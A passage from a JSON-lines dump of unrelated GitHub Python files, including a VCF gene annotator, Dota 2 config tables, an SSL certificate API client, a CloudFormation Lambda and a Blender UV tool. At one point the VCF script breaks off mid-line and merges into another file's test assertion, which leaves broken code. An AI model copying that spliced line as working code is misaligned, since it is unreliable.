row_dict['ID']\n self.filter = row_dict['FILTER']\n self.super_groups = []\n self.groups = []\n genotype_dict = dict(zip(row_dict['FORMAT'].split(\n ':'), row_dict['genotype'].split(':')))\n if 'GT' not in genotype_dict:\n self.genotype = None\n else:\n genotype = genotype_dict['GT'].split('/')\n if '.' in genotype:\n self.genotype = genotype\n elif len(set(genotype)) == 1:\n self.genotype = 'HOM'\n else:\n self.genotype = 'HET'\n if 'CN' not in genotype_dict:\n self.CN = None\n else:\n self.CN = int(genotype_dict['CN'])\n\ndef get_genes_at_bnd(chrom, pos, gtf_tbx, gtf_header, args):\n\n bnd_start = max(1, pos - args.padding)\n bnd_end = pos + args.padding\n result = set()\n for row in gtf_tbx.fetch(chrom, bnd_start, bnd_end):\n row_dict = dict(zip(gtf_header, row.split('\\t')))\n result.add(row_dict['ensembl_id'])\n return result\n\n\ndef main(args):\n '''\n Files in GRCh37 is annotated differently to those in GRCh38\n all_annotated_intervals_dict = {}\n Also GRCh37 needs to be lifted over\n only deals with Canvas, and MantaDEL/MantaINV\n '''\n\n vcf_header = ['CHROM', 'start', 'ID', 'REF', 'ALT',\n 'QUAL', 'FILTER', 'INFO', 'FORMAT', 'genotype']\n out_header = ['chrom', 'start', 'end', 'sv_id', 'filter', 'source', 'genotype', 'CN', 'type', 'genes', 'genes_at_bnd']\n\n # read contigs and gtf header\n contigs = set(subprocess.check_output(['tabix', '-l', args.gtf]).decode('utf8').split('\\n'))\n gtf_tbx = pysam.TabixFile(args.gtf)\n gtf_header = []\n with gzip.open(args.gtf, 'rt') as inf:\n for line in inf:\n if line.startswith('#'):\n gtf_header = line.lstrip('#').rstrip().split('\\t')\n break\n # read gtf_genes\n gtf_genes = []\n with gzip.open(args.gtf, 'rt') as inf:\n header = []\n for line in inf:\n row = line.lstrip('#').rstrip().split()\n if not header:\n header = row\n continue\n gtf_genes.append(dict(zip(header, row)))\n \n\n # GRCh37? get new coordinates\n if args.build == 'GRCh37':\n liftover_dict = {}\n fd, bed37 = tempfile.mkstemp()\n utils.makebed(args.input, bed37)\n for line in utils.liftover_file(bed37, args.liftOver_chainfile):\n row = line.rstrip().split('\\t')\n liftover_dict[row[3]] = {\n 'chrom': row[0],\n 'start': row[1],\n 'end': row[2],\n }\n os.close(fd)\n os.remove(bed37)\n # get CSQT header\n csqt_header = None\n if args.build == 'GRCh38':\n with gzip.open(args.input, 'rt') as inf:\n for line in inf:\n if line.startswith('##INFO= 5\n assert (fg_df[\"factoryglobal_manifests\"] is None) or (len(fg_df[\"factoryglobal_manifests\"]) == 0)\n","repo_name":"HEPCloud/decisionengine_modules","sub_path":"src/decisionengine_modules/tests/test_factory_global.py","file_name":"test_factory_global.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20623012198","text":"'''定义公共变量'''\nfile = 'npc_heroes.txt'\n#file = 'npc.txt'\n\njsonfile = 'npc_heroes.json'\n\nstr_null = '无此键值' # 读取属性时出现不存在的属性显示键值\nstr_error= '错误��值' \ncurrentline=0\n#属性字典#\nattribute_dict = {\n '护甲': ['物理护甲', '魔法抗性'],\n '攻击': ['最小攻击力', '最大攻击力', '攻击速度', '主动攻击范围', '攻击距离'],\n '属性': ['初始力量', '力量成长', '初始智力', '智力成长', '初始敏捷', '敏捷成长'],\n '移速': ['移动速度','null'],\n '状态': ['初始生命值', '生命恢复速度', '初始魔法值', '魔法恢复速度','null'],\n '视野': ['白天视野', '夜间视野'],\n\n #################################\n\n '技能': ['技能1', '技能2', '技能3', '技能4', '技能5', '技能6'],\n '天赋': ['10级右', '10级左', '15级右', '15级左', '20级右', '20级左', '25级右', '25级左'],\n '英雄主属性': ['英雄主属性']\n ###############################\n}\n\nchoiceitems_dict = {\n '技能': ['', \n '帕吉-腐肉堆积', 'lion_finger_of_death', '斯拉达-深海重击', \n '斯拉克-能量转移', '技能5', '技能6'],\n '天赋': ['', '10级右', '10级左', '15级右', '15级左', '20级右', '20级左', '25级右', '25级左'],\n '英雄主属性': ['', '力量', '敏捷', '智力'],\n ###############################\n 'null': []\n}\n\ntranslation = {\n ####基本属性###############################\n ####左侧##########################################\n #护甲#\n '物理护甲': 'ArmorPhysical',\n '魔法抗性': 'MagicalResistance',\n #攻击#\n '最小攻击力': \"AttackDamageMin\",\n '最大攻击力': \"AttackDamageMax\",\n '攻击速度': \"AttackRate\",\n '主动攻击范围': \"AttackAcquisitionRange\",\n '攻击距离': \"AttackRange\",\n #属性###########################\n '初始力量': \"AttributeBaseStrength\",\n '力量成长': \"AttributeStrengthGain\",\n '初始智力': \"AttributeBaseIntelligence\",\n '智力成长': \"AttributeIntelligenceGain\",\n '初始敏捷': \"AttributeBaseAgility\",\n '敏捷成长': \"AttributeAgilityGain\",\n #'移动速度'#\n '移动速度': \"MovementSpeed\",\n #状态#\n '初始生命值': \"StatusHealth\",\n '生命恢复速度': \"StatusHealthRegen\",\n '初始魔法值': \"StatusMana\",\n '魔法恢复速度': \"StatusManaRegen\",\n #视野#\n '白天视野': 'VisionDaytimeRange',\n '夜间视野': \"VisionNighttimeRange\",\n #技能#\n '技能1': 'Ability1',\n '技能2': 'Ability2',\n '技能3': 'Ability3',\n '技能4': 'Ability4',\n '技能5': 'Ability5',\n '技能6': 'Ability6',\n # 天赋\n '10级右': 'Ability10',\n '10级左': 'Ability11',\n '15级右': 'Ability12',\n '15级左': 'Ability13',\n '20级右': 'Ability14',\n '20级左': 'Ability15',\n '25级右': 'Ability16',\n '25级左': 'Ability17',\n ###################################################\n #####技能##########################################\n #普通技能\n '无技能':'generic_hidden',\n\n\n # 主属性\n '英雄主属性': \"AttributePrimary\",\n #### 其他 ##########################################\n '力量': \"DOTA_ATTRIBUTE_STRENGTH\",\n \"DOTA_ATTRIBUTE_STRENGTH\":'力量',\n '敏捷': \"DOTA_ATTRIBUTE_AGILITY\",\n '智力': \"DOTA_ATTRIBUTE_INTELLECT\",\n ####choice#########################################\n '帕吉-腐肉堆积':'pudge_flesh_heap',\n '死亡一指': 'lion_finger_of_death',\n '斯拉达-深海重击':'slardar_bash',\n '斯拉克-能量转移':\"slark_essence_shift\",\n #### 结尾 ##########################################\n 'null': 'null'\n}\n\n\ndef t():\n '''自动反转 translation的属性与值'''\n l1 = list(translation.keys())\n l2 = list(translation.values())\n for i in l1:\n print(i, l2[l1.index(i)])\n","repo_name":"bmzk/dota2-unit-","sub_path":"公共变量.py","file_name":"公共变量.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75305987619","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport argparse\nimport os\n\nimport requests\n\nINAP_API_TOKEN = os.getenv(\"INAP_API_TOKEN\", default=\"FILL_ME\")\nINAP_API_BASE_URL = \"https://inblue.inap.com/api/purchasing/v1/ssl-certs\"\nCOMMON_HEADERS = {\n \"Accept\": \"application/json\",\n \"Authorization\": f\"Bearer {INAP_API_TOKEN}\",\n}\n\nlogger = logging.getLogger(__name__)\n\ndef get_list():\n response = requests.get(f'{INAP_API_BASE_URL}?limit=25&offset=0')\n\n\ndef initialize(hostname: str, first_name: str, last_name: str, email: str, phone: str) -> list[str]:\n try:\n response = requests.post(\n url=f'{INAP_API_BASE_URL}/initialize',\n json={\n \"hostname\": hostname,\n \"contactFirstName\": first_name,\n \"contactLastName\": last_name,\n \"contactEmailAddress\": email,\n \"contactPhoneNumber\": phone\n },\n headers=COMMON_HEADERS\n )\n\n if response.status_code != 200:\n raise Exception(f\"Unable to fetch approve emails, response code[{response.status_code}] {response.json()}\")\n\n resp = response.json()\n\n if resp['success'] is not True:\n raise Exception(f\"Unable to fetch approve emails, response code[{response.status_code}] {response.json()}\")\n\n logger.info(f\"Order #{resp['certId']} created.\")\n # logger.info(f\"available approver email as follows, choose one: \")\n return resp[\"approverEmails\"]\n except Exception as e:\n logger.critical(e)\n\n\ndef finalize(order_id: str, approver_email: str, csr: str) -> bool:\n try:\n response = requests.post(\n url=f'{INAP_API_BASE_URL}/{order_id}/finalize',\n json={\n \"approverEmailAddress\": approver_email,\n \"csr\": csr\n },\n headers=COMMON_HEADERS\n )\n\n if response.status_code != 200:\n raise Exception(f\"Unable to fetch order status, maybe you should try again later, \"\n f\"response code[{response.status_code}] {response.json()}\")\n\n resp = response.json()\n\n if resp['success'] != \"1\":\n raise Exception(f\"Unable to fetch order status, maybe you should try again later, \"\n f\"response code[{response.status_code}] {response.json()}\")\n\n logger.info(f\"Order #{order_id} placed.\")\n logger.info(f'Please check your inbox \"{approver_email}\" to finalize your certificate order.')\n # logger.info(f\"available approver email as follows, choose one: \")\n return True\n except Exception as e:\n logger.critical(e)\n\n\ndef gather_info():\n hostname = input(\"Input domain which requires certificate: \").strip()\n first_name = input(\"Your first name: \").strip()\n last_name = input(\"Your last name: \").strip()\n email = input(\"Your email address (use to receive certificate): \").strip()\n phone = input(\"Your phone number: \").strip()\n return hostname, first_name, last_name, email, phone\n\n\ndef interactive_mode(dry_run: bool):\n pass\n\n\ndef automation_mode():\n pass\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('leap4cert')\n parser.add_argument('--debug',\n action='store_true',\n help='Print debug info')\n parser.add_argument('--config',\n default=None,\n nargs='?',\n help='run workflow with pre-defined config')\n parser.add_argument('--version',\n action='version',\n version='%(prog)s v1.0.0')\n\n subprasers = parser.add_subparsers(dest='command')\n\n # sub cmd: order\n # fill domain and contact details to create certificate order\n order = subprasers.add_parser('order', help='create a certificate order')\n order.add_argument(\n '--dry-run',\n help='do not order, just pretend',\n action='store_true'\n )\n\n # sub cmd: finalize\n # fill csr and choose email to complete the DCV process\n finalize = subprasers.add_parser('finalize', help='finalize certificate order')\n finalize.add_argument('id', nargs=1, help='id of order to finalize')\n\n # parse it\n args = parser.parse_args()\n if args.debug:\n print(\"debug: \" + str(args))\n if args.command == 'order':\n interactive_mode(dry_run=args.dry_run)\n elif args.command == 'finalize':\n print(f'processing for order #{args.id[0]}')\n\n # if not os.path.isfile(input_path):\n # print('The path specified does not exist')\n # sys.exit()\n","repo_name":"deamwork/leap4cert","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23712151742","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, api\n\n_DOCTYPE = {'quotation': 'sale_quotation',\n 'sale_order': 'sale_order'}\n\n\nclass SaleOrder(models.Model):\n _inherit = 'sale.order'\n\n @api.model\n def create(self, vals):\n if vals.get('name', '/') == '/':\n # Automatic Workflow = POS Order\n if vals.get('workflow_process_id', False):\n doctype = self.env['res.doctype'].get_doctype('pos_order')\n fiscalyear_id = self.env['account.fiscalyear'].find()\n # --\n self = self.with_context(doctype_id=doctype.id,\n fiscalyear_id=fiscalyear_id)\n next = self.env['ir.sequence'].next_by_doctype()\n if next:\n vals['name'] = next\n return super(SaleOrder, self).create(vals)\n","repo_name":"ecosoft-odoo/pb2_addons","sub_path":"pabi_th_doctype/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"75357472100","text":"\nclass Employee:\n list_of_employee = [['Vlad', 'Palamarchuk', 'Ukraine', 2020], ['Vladislav', 'Sodolevski', 'Ukraine', 2019]]\n\n def employee(self):\n lst = []\n try:\n lst.append(str(input('Enter your name: ')))\n lst.append(str(input('Enter your second name: ')))\n lst.append(str(input('Enter your department (country): ')))\n lst.append(int(input('Enter your year hiring: ')))\n self.list_of_employee.append(lst)\n Employee().choose()\n except ValueError:\n print(f'You enter incorrect value, try again!')\n return Employee().employee()\n\n def filter(self):\n filtered = []\n try:\n year_hiring = int(input('Which year of employment to show: '))\n for item in self.list_of_employee:\n for i in item:\n if i == year_hiring:\n filtered.append(item)\n print(filtered)\n\n except ValueError:\n print('There is no such year of admission to work!')\n return Employee().filter()\n\n @staticmethod\n def choose():\n while True:\n try:\n action = int(input('For adding new employee enter 1, for find employee enter 2: '))\n if action == 1:\n Employee().employee()\n elif action == 2:\n Employee().filter()\n else:\n return Employee().choose()\n except ValueError:\n print('You enter incorrect value, try again!')\n return Employee().choose()\n\n\nEmployee().choose()\n","repo_name":"llpvqll/homework_from_course","sub_path":"exeptionLessons/third_task.py","file_name":"third_task.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74426814821","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef Y(x):\r\n return 5 * np.sin(10 * x) * np.sin(3 * x) / np.sqrt(x)\r\n\r\n#значення x [1, 7] з кроком 0.1\r\nx_values = np.linspace(1, 7, 100)\r\ny_values = Y(x_values)\r\n\r\n#побудова графіка\r\nplt.plot(x_values, y_values, linestyle='-', color='pink', linewidth=2, label='Y(x)')\r\n\r\n#позначення осей\r\nplt.xlabel('X')\r\nplt.ylabel('Y')\r\n\r\n#назва графіка\r\nplt.title('Графік функції Y(x) = 5*sin(10*x)*sin(3*x)/(x^(1/2))')\r\n\r\n#легенда\r\nplt.legend()\r\n\r\n#відображення графіка\r\nplt.show()","repo_name":"lichueva/puthon","sub_path":"Візуалізація даних за допомогою Python бібліотек/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8270247060","text":"from typing import Any, Dict\n\nimport httpx\n\nfrom ...client import Client\nfrom ...types import Response\n\n\ndef _get_kwargs(\n id: str,\n geofence_id: str,\n *,\n client: Client,\n) -> Dict[str, Any]:\n url = \"{}/assets/{id}/geofences/{geofence_id}\".format(client.base_url, id=id, geofence_id=geofence_id)\n\n headers: Dict[str, str] = client.get_headers()\n cookies: Dict[str, Any] = client.get_cookies()\n\n return {\n \"method\": \"delete\",\n \"url\": url,\n \"headers\": headers,\n \"cookies\": cookies,\n \"timeout\": client.get_timeout(),\n }\n\n\ndef _build_response(*, response: httpx.Response) -> Response[Any]:\n return Response(\n status_code=response.status_code,\n content=response.content,\n headers=response.headers,\n parsed=None,\n )\n\n\ndef sync_detailed(\n id: str,\n geofence_id: str,\n *,\n client: Client,\n) -> Response[Any]:\n \"\"\"Delete Single Geofence\n\n Args:\n id (str): Asset ID Example: 272956057382HD3JBSD24.\n geofence_id (str): Example: 1140762987615GIDWGA.\n\n Returns:\n Response[Any]\n \"\"\"\n\n kwargs = _get_kwargs(\n id=id,\n geofence_id=geofence_id,\n client=client,\n )\n\n response = httpx.request(\n verify=client.verify_ssl,\n **kwargs,\n )\n\n return _build_response(response=response)\n\n\nasync def asyncio_detailed(\n id: str,\n geofence_id: str,\n *,\n client: Client,\n) -> Response[Any]:\n \"\"\"Delete Single Geofence\n\n Args:\n id (str): Asset ID Example: 272956057382HD3JBSD24.\n geofence_id (str): Example: 1140762987615GIDWGA.\n\n Returns:\n Response[Any]\n \"\"\"\n\n kwargs = _get_kwargs(\n id=id,\n geofence_id=geofence_id,\n client=client,\n )\n\n async with httpx.AsyncClient(verify=client.verify_ssl) as _client:\n response = await _client.request(**kwargs)\n\n return _build_response(response=response)\n","repo_name":"scorgn/lojack-clients","sub_path":"src/lojack_clients/services/api/default/delete_single_geofence.py","file_name":"delete_single_geofence.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"29171988250","text":"import openpyxl as xl\nimport math\n\n\nbook = xl.load_workbook(\"App.xlsx\", data_only=True)\nhoja = book.active\ncelda = hoja['A2':'C60']\nnumero_telefono = []\ndatos = []\n\nfor fila in celda:\n numero = [celda.value for celda in fila]\n datos.append(numero)\n\nfor numeritos in datos:\n num = numeritos[2].split(\"(\")\n numero_telefono.append(num)\n\nlada = []\n\nfor evaluar in numero_telefono:\n lad = evaluar[0]\n lada.append(lad)\n\nn = 0\n#Variables ciudad que sirven para saber la cantidad exacta de cada ciudad. \nciudad1 = 0\nciudad2 = 0\nciudad3 = 0\nciudad4 = 0\nciudad5 = 0\nciudad6 = 0\nciudad7 = 0\nciudad8 = 0\nciudad9 = 0\nciudad10 = 0\nciudad11 = 0\ntotal = 0\ntotalin = 0\nwhile n < len(lada):\n with open(\"data.txt\") as f:\n lineas = f.readlines()\n \n i = 0\n lista = []\n\n while i < len(lineas):\n lin = lineas[i].replace(\"=\", \"\")\n lin = lin.replace(\" \", \"-\")\n lin = lin.replace(\"\\n\", \"\")\n lin = lin.replace(\"{\", \"\")\n lin = lin.replace(\"}\", \"\")\n lista.append(lin.split(\"-\"))\n i = i + 1\n\n q = lista[0][1].split(\",\")\n s = lista[1][1].split(\",\")\n\n # s.append('e')\n q0 = lista[2][1].split(\",\")\n f = lista[3][1].split(\",\")\n aux = lista[4][1]\n r = aux[1:len(aux)-1].split(\"),(\")\n estados = []\n i = 0\n while i < len(r):\n estados.append(r[i].split(\",\"))\n i = i + 1\n\n\n estado_final = False\n estados_actuales = []\n estados_actuales.append(q0[0])\n \n\n cadena = list(lada[n])\n\n while cadena:\n # print(\"evaluand la cadena >>>>\",cadena,\"<<<<\")\n if(cadena[0] in s):\n num_estados = len(estados_actuales)\n for i in range(len(estados)):\n for j in range(num_estados):\n if estados[i][0] == estados_actuales[j] and estados[i][1] == cadena[0]:\n estados_actuales.append(estados[i][2])\n #print(estados_actuales[j],\" dentro del for\")\n for y in range(num_estados):\n estados_actuales.remove(estados_actuales[0])\n #print(estados_actuales,\" fuera del for\")\n cadena.remove(cadena[0])\n else:\n #print(\"Un estado en la cadena no es valido\", \">>>\", cadena[0], \"<<<\")\n break\n\n \n if 'q1' in estados_actuales:\n ciudad1 = ciudad1 + 1\n elif 'q2'in estados_actuales:\n ciudad2 = ciudad2 + 1\n elif 'q4'in estados_actuales:\n ciudad3 = ciudad3 + 1\n elif 'q6'in estados_actuales:\n ciudad4 = ciudad4 + 1\n elif 'q8'in estados_actuales:\n ciudad5 = ciudad5 + 1\n elif 'q11' in estados_actuales:\n ciudad6 = ciudad6 +1\n elif 'q13'in estados_actuales:\n ciudad7 = ciudad7 + 1\n elif 'q15'in estados_actuales:\n ciudad8 = ciudad8 + 1\n elif 'q17'in estados_actuales:\n ciudad9 = ciudad9 + 1\n elif 'q19'in estados_actuales:\n ciudad10 = ciudad10 + 1\n elif 'q20' in estados_actuales:\n ciudad11 = ciudad11 + 1\n \n \n for i in range(len(estados_actuales)):\n if(estados_actuales[i] in f):\n estado_final = True\n break\n else:\n estado_final = False\n\n if estado_final == True:\n # print(\"cadena valida\")\n total = total +1\n else:\n totalin = totalin +1\n #print(\"cadena invalida\") \n n = n + 1\nprint(\"Hay un total de \",ciudad1,\" en la ciudad de Albania\")\nprint(\"Hay un total de \",ciudad2,\" en la ciudad de Finlandia\")\nprint(\"Hay un total de \",ciudad3,\" en la ciudad de Alemania\")\nprint(\"Hay un total de \",ciudad4,\" en la ciudad de Andorra\")\nprint(\"Hay un total de \",ciudad5,\" en la ciudad de Angola\")\nprint(\"Hay un total de \",ciudad6,\" en la ciudad de Antártida\")\nprint(\"Hay un total de \",ciudad7,\" en la ciudad de Arabia Saudita\")\nprint(\"Hay un total de \",ciudad8,\" en la ciudad de Argelia\")\nprint(\"Hay un total de \",ciudad9,\" en la ciudad de Cuba\")\nprint(\"Hay un total de \",ciudad10,\" en la ciudad de Armenia\")\nprint(\"Hay un total de \",ciudad11,\" en la ciudad de Ascensión, Isla\")\n\n\n","repo_name":"mauricioMatuz/AUTOMATAS","sub_path":"App/probando.py","file_name":"probando.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8485164522","text":"import json\nimport logging\nimport uuid\nimport urllib.request\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\ndef cfn_response(url: str, body: object) -> None:\n data = json.dumps(body).encode()\n headers = {\n 'content-type': 'application/json',\n 'content-length': str(len(data)),\n }\n req = urllib.request.Request(url, method='PUT', data=data, headers=headers)\n with urllib.request.urlopen(req) as res:\n res.read() # skip the body\n\n\ndef handler(event, context):\n data = {}\n for k, v in event['ResourceProperties'].items():\n data[k] = json.dumps(v, separators=(',', ':'), sort_keys=True)\n resourceId = event.get('PhysicalResourceId') or str(uuid.uuid4())\n ret = {\n 'Status': 'SUCCESS',\n 'StackId': event['StackId'],\n 'RequestId': event['RequestId'],\n 'LogicalResourceId': event['LogicalResourceId'],\n 'Data': data,\n 'PhysicalResourceId': resourceId,\n }\n cfn_response(event['ResponseURL'], ret)\n","repo_name":"shogo82148/cfn-json-string-macro","sub_path":"awslambda/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"11543170058","text":"import os\nfrom setuptools import setup, find_packages\n\n\n__version__ = '1.5.0'\n\n\nrequirements_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'requirements.txt')\nwith open(requirements_path) as requirements_file:\n requirements = requirements_file.readlines()\n\nkafka = ['confluent-kafka==1.0.0']\n\ncassandra = ['cassandra-driver==3.20.1']\n\nglue = ['boto3==1.10.1']\n\nsnowflake = [\n 'snowflake-connector-python',\n 'snowflake-sqlalchemy'\n]\n\nathena = ['PyAthena[SQLAlchemy]>=1.0.0']\n\n# Python API client for google\n# License: Apache Software License\n# Upstream url: https://github.com/googleapis/google-api-python-client\nbigquery = [\n 'google-api-python-client>=1.6.0, <2.0.0dev',\n 'google-auth-httplib2>=0.0.1'\n 'google-auth>=1.0.0, <2.0.0dev'\n]\n\nall_deps = requirements + kafka + cassandra + glue + snowflake + athena + bigquery\n\nsetup(\n name='amundsen-databuilder',\n version=__version__,\n description='Amundsen Data builder',\n url='https://www.github.com/lyft/amundsendatabuilder',\n maintainer='Lyft',\n maintainer_email='dev@lyft.com',\n packages=find_packages(exclude=['tests*']),\n dependency_links=[],\n install_requires=requirements,\n extras_require={\n ':python_version==\"2.7\"': ['typing>=3.6'], # allow typehinting PY2\n 'all': all_deps,\n 'kafka': kafka, # To use with Kafka source extractor\n 'cassandra': cassandra,\n 'glue': glue,\n 'snowflake': snowflake,\n 'athena': athena,\n 'bigquery': bigquery\n },\n)\n","repo_name":"metadataxpress/metadataxpress","sub_path":"amundsendatabuilder/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44976316566","text":"from heartandsole.core.fields.base import ActivityField\nfrom heartandsole.compat._optional import import_optional_dependency\n\n\nclass DistanceField(ActivityField):\n \n _field_name = 'distance'\n\n def total(self, source='records'):\n \"\"\"Return total distance in meters.\n\n Args:\n source (str): Source from which to obtain total distance.\n \n - ``records`` (default): last cumulative distance value in the \n records DataFrame.\n - ``summary``: ``total`` value in the summary Series.\n - ``laps``: sum of ``total`` column in the laps DataFrame.\n - ``position``: last cumulative distance value in the Series\n calculated by :meth:`Activity.distance.records_from_position`.\n \n Returns:\n float or None: Total distance according to the requested source. \n If the Activity does not possess the requested data source, return None.\n\n Raises:\n ValueError: If source is not a valid option.\n\n See also:\n :meth:`Activity.distance.records_from_position`\n Calculate cumulative distance from GPS coordinates.\n \n \"\"\"\n if source == 'records':\n if self.stream is not None:\n return self.stream.iloc[-1]\n elif source == 'summary':\n if 'total' in self.summary.index:\n return self.summary['total']\n elif source == 'laps':\n if 'total' in self.laps.columns:\n return self.laps['total'].sum()\n elif source == 'position':\n if self.activity.has_position:\n return self.records_from_position().iloc[-1]\n else:\n raise ValueError('Arg must be one of: \"records\", \"summary\", \"laps\", \"position\"')\n \n\n # @property\n def records_from_position(self, inplace=False):\n \"\"\"Cumulative distance records calculated from GPS coordinate records.\n\n Args:\n inplace (bool): Whether to add the Series result as a column to the\n records DataFrame. Default False.\n\n Returns:\n pandas.Series or None: The Series result or None if ``inplace=True``\n or if the records DataFrame does not contain ``lat`` and ``lon`` columns.\n\n Examples:\n\n When called with ``inplace=False``, this method returns a Series:\n \n >>> records = pd.DataFrame({\n ... 'lat': [40.0, 40.0001, 40.0002],\n ... 'lon': [-105.2, -105.2, -105.2]\n ... })\n >>> act = Activity(records)\n >>> act.distance.records_from_position()\n 0 0.000000\n 1 11.119493\n 2 22.238985\n dtype: float64\n\n When called with ``inplace=True``, this method updates the records\n DataFrame:\n\n >>> act.distance.records_from_position(inplace=True)\n >>> act.records\n lat lon distance\n 0 40.0000 -105.2 0.000000\n 1 40.0001 -105.2 11.119493\n 2 40.0002 -105.2 22.238985\n\n See also:\n\n :meth:`pandas.DataFrame.xyz.s_from_xy`\n Custom DataFrame accessor method for calculating cumulative distance\n from GPS coordinates. From the ``pandas-xyz`` package.\n\n \"\"\"\n\n if self.activity.has_position:\n\n # Option 1 (untested, might need work):\n # pxyz = import_optional_dependency('pandas_xyz')\n # return pxyz.algorithms.s_from_xy(\n # self.activity.lat.stream,\n # self.activity.lon.stream\n # )\n\n # Option 2:\n import_optional_dependency('pandas_xyz')\n\n # If no kwargs, assumes stream names are 'lat' and 'lon'\n distance_stream = self.activity.records.xyz.s_from_xy(\n lat=self.activity.lat.record_stream_label, # or ._field_name\n lon=self.activity.lon.record_stream_label,\n )\n\n if not inplace:\n return distance_stream\n\n self.activity.records[self.record_stream_label] = distance_stream","repo_name":"aaron-schroeder/heartandsole","sub_path":"heartandsole/core/fields/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"42168233667","text":"from time import sleep\nfrom celery import shared_task\nfrom django.core.mail import send_mail\n\n\n@shared_task\ndef send_book(nombre, mail):\n sleep(20) # Simula operaciones muy pesadas que congelan a Django\n print(\n nombre + \" \" + mail\n )\n\n\n\n@shared_task\ndef enviar_correo(nombre, mail):\n \n send_mail(\n 'Subject here',\n 'Here is the message.',\n 'from@example.com',\n [mail],\n fail_silently=False,\n )\n\n return \"correo enviado\"","repo_name":"angelbonillago/sesiones_silabuz","sub_path":"sesiones/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31580030516","text":"import bpy\nimport bmesh\nimport operator\nfrom mathutils import Vector\nfrom collections import defaultdict\nfrom math import pi\nimport math\nfrom . import utilities_meshtex\n\n\n\nclass op(bpy.types.Operator):\n\tbl_idname = \"uv.textools_meshtex_wrap\"\n\tbl_label = \"Wrap Mesh Texture\"\n\tbl_description = \"Swap UV to XYZ coordinates\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t@classmethod\n\tdef poll(cls, context):\n\t\tif not bpy.context.active_object or bpy.context.active_object.mode != 'OBJECT':\n\t\t\treturn False\n\t\t\t\n\t\t# Wrap texture mesh around UV mesh\n\t\tif len(bpy.context.selected_objects) >= 1:\n\t\t\t# Find a UV mesh\n\t\t\tif utilities_meshtex.find_uv_mesh(bpy.context.selected_objects):\n\t\t\t\t# Find 1 or more meshes to wrap\n\t\t\t\tif len( utilities_meshtex.find_texture_meshes(bpy.context.selected_objects)) > 0:\n\t\t\t\t\treturn True\n\n\t\treturn False\n\n\tdef execute(self, context):\n\t\twrap_meshtex(self)\n\t\treturn {'FINISHED'}\n\n\n\ndef wrap_meshtex(self):\n\t# Wrap the mesh texture around the \n\tprint(\"Wrap Mesh Texture :)\")\n\n\t# Collect UV mesh\n\tobj_uv = utilities_meshtex.find_uv_mesh(bpy.context.selected_objects)\n\tif not obj_uv:\n\t\tself.report({'ERROR_INVALID_INPUT'}, \"No UV mesh found\" )\n\t\treturn\n\n\t# Collect texture meshes\n\tobj_textures = utilities_meshtex.find_texture_meshes( bpy.context.selected_objects )\n\n\tif len(obj_textures) == 0:\n\t\tself.report({'ERROR_INVALID_INPUT'}, \"No meshes found for mesh textures\" )\n\t\treturn\n\n\tprint(\"Wrap {} texture meshes\".format(len(obj_textures)))\n\n\t# Undo wrapping\n\tif bpy.context.scene.texToolsSettings.meshtexture_wrap > 0:\n\t\tbpy.context.scene.texToolsSettings.meshtexture_wrap = 0\n\t\t# Clear modifiers\n\t\tutilities_meshtex.uv_mesh_clear(obj_uv)\n\t\treturn\n\t\n\t# Setup Thickness\n\tutilities_meshtex.uv_mesh_fit(obj_uv, obj_textures)\n\n\tfor obj in obj_textures:\n\t\t# Delete previous modifiers\n\t\tfor modifier in obj.modifiers:\n\t\t\tif modifier.type == 'SURFACE_DEFORM':\n\t\t\t\tobj.modifiers.remove(modifier)\n\t\t\t\tbreak\n\n\t\t# Add mesh modifier\n\t\tmodifier_deform = obj.modifiers.new(name=\"SurfaceDeform\", type='SURFACE_DEFORM')\n\t\tmodifier_deform.target = obj_uv\n\n\t\tobj.select = True\n\t\tbpy.context.scene.objects.active = obj\n\t\tbpy.ops.object.surfacedeform_bind(modifier=\"SurfaceDeform\")\n\n\t# Apply wrapped morph state\n\tbpy.context.scene.texToolsSettings.meshtexture_wrap = 1\n","repo_name":"Calinou/textools-blender","sub_path":"addons/textools/op_meshtex_wrap.py","file_name":"op_meshtex_wrap.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"41548718599","text":"from datetime import datetime, timezone\nfrom urllib.parse import 